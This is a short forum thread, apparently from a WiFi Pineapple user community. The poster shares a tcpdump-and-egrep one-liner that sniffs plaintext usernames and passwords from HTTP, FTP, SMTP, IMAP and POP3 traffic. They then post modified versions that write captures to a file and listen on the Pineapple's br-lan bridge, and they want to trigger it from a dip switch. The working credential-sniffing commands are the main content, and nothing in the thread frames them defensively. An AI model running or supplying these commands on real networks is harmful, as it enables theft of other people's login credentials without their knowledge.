overwraith Posted May 12, 2014 Share Posted May 12, 2014 (edited) So I found this command online: tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20 At this website: http://www.commandlinefu.com/commands/view/10882/plaintext-credentials-sniffing-with-tcpdump-and-grep Have been scouring the web, trying to figure out it's syntax, and I tried to modify it to send output to a file. Does anybody know what I am doing wrong? Do you all have some commands that are more useful? Here is what I tried to send it to a file: root@Pineapple:~# tcpdump port http or port ftp or port smtp or port imap or por t pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passw d=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto -- line-buffered -B20 > stuff.txt Would be cool to be able to run this from a dip switch. The Color part of the command seems non useful, and the command only lasts a couple of seconds, I was expecting it to run longer. Edited May 16, 2014 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted May 16, 2014 Author Share Posted May 16, 2014 Removed the color variable, and set the interface to the br-lan, from what I understand this is the bridge built into the pineapple. tcpdump port http or port ftp or port smtp or port imap or port pop3 -i br-lan -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --line-buffered -B20 Still trying to figure out why both the commands use some sort of buffering. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.